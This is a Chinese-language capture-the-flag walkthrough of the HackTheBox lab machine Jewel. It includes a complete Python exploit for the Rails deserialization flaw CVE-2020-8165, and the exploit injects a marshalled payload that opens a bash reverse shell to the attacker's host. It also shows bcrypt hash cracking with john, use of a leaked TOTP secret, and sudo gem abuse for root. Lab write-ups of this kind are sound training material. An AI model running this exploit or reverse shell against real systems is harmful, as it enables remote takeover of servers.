Jewel - HackTheBox

基本信息

• https://www.hackthebox.eu/home/machines/profile/282

• 10.10.10.211

端口扫描

常规的22,8000,8080：

$ nmap -Pn -sC -sV 10.10.10.211
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2020-10-27 08:50 CST
Nmap scan report for 10.10.10.211
Host is up (0.069s latency).
Not shown: 997 filtered ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
|   2048 fd:80:8b:0c:73:93:d6:30:dc:ec:83:55:7c:9f:5d:12 (RSA)
|   256 61:99:05:76:54:07:92:ef:ee:34:cf:b7:3e:8a:05:c6 (ECDSA)
|_  256 7c:6d:39:ca:e7:e8:9c:53:65:f7:e2:7e:c7:17:2d:c3 (ED25519)
8000/tcp open  http    Apache httpd 2.4.38
|_http-generator: gitweb/2.20.1 git/2.20.1
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:CONNECTION
|_http-server-header: Apache/2.4.38 (Debian)
| http-title: 10.10.10.211 Git
|_Requested resource was http://10.10.10.211:8000/gitweb/
8080/tcp open  http    nginx 1.14.2 (Phusion Passenger 6.0.6)
|_http-server-header: nginx/1.14.2 + Phusion Passenger 6.0.6
|_http-title: BL0G!
Service Info: Host: jewel.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.17 seconds

8000

8000是gitweb：

8080

8080是一个blog：

gitweb

8000的gitweb简单浏览能发现一些文件，其中有一个bd.sql是sql备份文件：

http://10.10.10.211:8000/gitweb/?p=.git;a=blob;f=bd.sql;h=a7fddb693ca735f8aa1e4b09046cec2adddddc51;hb=HEAD

bd.sql

在sql文件中得到用户信息：

COPY public.users (id, username, email, created_at, updated_at, password_digest) FROM stdin;
1	bill	bill@mail.htb	2020-08-25 08:13:58.662464	2020-08-25 08:13:58.662464	$2a$12$uhUssB8.HFpT4XpbhclQU.Oizufehl9qqKtmdxTXetojn2FcNncJW
2	jennifer	jennifer@mail.htb	2020-08-25 08:54:42.8483	2020-08-25 08:54:42.8483	$2a$12$ik.0o.TGRwMgUmyOR.Djzuyb/hjisgk2vws1xYC/hxw8M1nFk0MQy
\.

john

对得到的Hash进行破解,hash是bcrypt加密格式,破解失败(兔子洞)：

➜  Jewel cat hashes.txt
$2a$12$uhUssB8.HFpT4XpbhclQU.Oizufehl9qqKtmdxTXetojn2FcNncJW
$2a$12$ik.0o.TGRwMgUmyOR.Djzuyb/hjisgk2vws1xYC/hxw8M1nFk0MQy

➜  Jewel sudo john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt
[sudo] password for miao:
Using default input encoding: UTF-8
Loaded 2 password hashes with 2 different salts (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 4096 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status

BL0G

转到8080 blog，随意注册一个账号登录：

rails

http://10.10.10.211:8000/gitweb/?p=.git;a=commitdiff;h=5d6f436256c9575fbc7b1fb9621b18f0f8656741

根据8000端口gitweb上面的信息，这个blog应该是基于ruby rails，并且rails版本是5.2.2.1：

搜索得到CVE-2020-8165：

• [CVE-2020-8165] Potentially unintended unmarshalling of user-provided objects in MemCacheStore and RedisCacheStore
  https://groups.google.com/g/ruby-security-ann/c/OEWeyjD7NHY
• masahiro331/CVE-2020-8165
  https://github.com/masahiro331/CVE-2020-8165

之后就是一步步打，或者直接用脚本

CVE-2020-8165.py

#!/usr/bin/python
#

import requests
import re
import sys

URL='http://{}:8080'.format(sys.argv[1])
username='miao'
password='123456'
email='miao@miao.com'

if len(sys.argv) != 4:
	print("specify target IP, your IP and port: python3 rev.py 10.10.xx.xx 9001")
	exit(0)

s = requests.Session()

resp = s.get(URL + '/signup')
rx = r'token" content="(.*)"'

token = re.search(rx,resp.text).group(1)

# create user
data = {}
data['utf8'] = 'â'
data['authenticity_token'] = token
data['user[username]'] = username
data['user[email]'] = email
data['user[password]'] = password
data['commit'] = 'Create User'
resp = s.post(URL + '/users', data=data)

# login
data = {}
data['utf8'] = 'â'
data['authenticity_token'] = token
data['session[email]'] = email
data['session[password]'] = password
data['commit'] = 'Log in'
resp = s.post(URL + '/login', data=data)

rx = r'href="/users/(.*)"'
user_id = re.search(rx,resp.text).group(1)

# rev shell
rev = "bash -c 'bash -i >& /dev/tcp/{}/{} 0>&1'".format(sys.argv[2], sys.argv[3])
payload = '\x04\x08o\x3A\x40ActiveSupport\x3A\x3ADeprecation\x3A\x3ADeprecatedInstanceVariableProxy'
payload += '\x09\x3A\x0E\x40instanceo\x3A\x08ERB\x08\x3A\x09\x40srcI\x22'
payload += '{}\x60{}\x60'.format(chr(len(rev)+7), rev)
payload += '\x06\x3A\x06ET\x3A\x0E\x40filenameI\x22\x061\x06\x3B\x09T\x3A\x0C\x40linenoi\x06\x3A\x0C\x40method\x3A'
payload += '\x0Bresult\x3A\x09\x40varI\x22\x0C\x40result\x06\x3B\x09T\x3A\x10\x40deprecatorIu\x3A\x1F'
payload += 'ActiveSupport\x3A\x3ADeprecation\x00\x06\x3B\x09T'

data = {}
data['utf8'] = 'â'
data['authenticity_token'] = token
data['_method'] = 'patch'
data['user[username]'] = payload
data['commit'] = 'Update User'
s.post(URL + '/users/' + user_id, data=data)
s.post(URL + '/users/' + user_id, data=data)

s.get(URL + '/articles')

user flag

打到bill用户的shell，在用户目录得到userx.txt：

python3 CVE-2020-8165.py 10.10.10.211 10.10.14.7 4445

提权信息

/home/bill/blog/bd.sql

Blog目录也有个bd.sql:

COPY public.users (id, username, email, created_at, updated_at, password_digest) FROM stdin;
1	bill	bill@mail.htb	2020-08-25 08:13:58.662464	2020-08-25 08:13:58.662464	$2a$12$uhUssB8.HFpT4XpbhclQU.Oizufehl9qqKtmdxTXetojn2FcNncJW
2	jennifer	jennifer@mail.htb	2020-08-25 08:54:42.8483	2020-08-25 08:54:42.8483	$2a$12$ik.0o.TGRwMgUmyOR.Djzuyb/hjisgk2vws1xYC/hxw8M1nFk0MQy
\.

/var/backups/dump_2020-08-27.sql

backups目录也有个sql文件：

COPY public.users (id, username, email, created_at, updated_at, password_digest) FROM stdin;
2	jennifer	jennifer@mail.htb	2020-08-27 05:44:28.551735	2020-08-27 05:44:28.551735	$2a$12$sZac9R2VSQYjOcBTTUYy6.Zd.5I02OnmkKnD3zA6MqMrzLKz0jeDO
1	bill	bill@mail.htb	2020-08-26 10:24:03.878232	2020-08-27 09:18:11.636483	$2a$12$QqfetsTSBVxMXpnTR.JfUeJXcJRHv5D5HImL0EHI7OzVomCrqlRxW
\.

hash crack

再次尝试破解这些hash，这次解出来一个：

➜  Jewel cat hashes.txt
$2a$12$uhUssB8.HFpT4XpbhclQU.Oizufehl9qqKtmdxTXetojn2FcNncJW
$2a$12$ik.0o.TGRwMgUmyOR.Djzuyb/hjisgk2vws1xYC/hxw8M1nFk0MQy
$2a$12$sZac9R2VSQYjOcBTTUYy6.Zd.5I02OnmkKnD3zA6MqMrzLKz0jeDO
$2a$12$QqfetsTSBVxMXpnTR.JfUeJXcJRHv5D5HImL0EHI7OzVomCrqlRxW
➜  Jewel sudo john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt
[sudo] password for miao:
Using default input encoding: UTF-8
Loaded 4 password hashes with 4 different salts (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 4096 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
spongebob        (?)

这个密码是bill用户的，但尝试sudo -l后还需要一个验证码：

.google_authenticator

在bill用户目录发现隐藏文件.google_authenticator：

bill@jewel:~$ cat .google_authenticator
cat .google_authenticator
2UQI3R52WFCLE6JTLDCSJYMJH4
" WINDOW_SIZE 17
" TOTP_AUTH
bill@jewel:~$

得到OTP生成的secret，然后随便找个生成工具就可以生成OTP：

sudo -l

sudo -l显示可以可以使用gem:

利用方式：

• gem | GTFOBins
  https://gtfobins.github.io/gtfobins/gem/

提权 & root flag

然后就是一键root，得到root.txt：

参考资料

• [CVE-2020-8165] Potentially unintended unmarshalling of user-provided objects in MemCacheStore and RedisCacheStore
  https://groups.google.com/g/ruby-security-ann/c/OEWeyjD7NHY
• masahiro331/CVE-2020-8165
  https://github.com/masahiro331/CVE-2020-8165
• gem | GTFOBins
  https://gtfobins.github.io/gtfobins/gem/
• Jewel HackTheBox WalkThrough | Ethicalhacs.com
  https://ethicalhacs.com/jewel-hackthebox-walkthrough/
• Jewel - YouTube
  https://www.youtube.com/watch?v=QLdUkyySnic&ab_channel=DavidDavies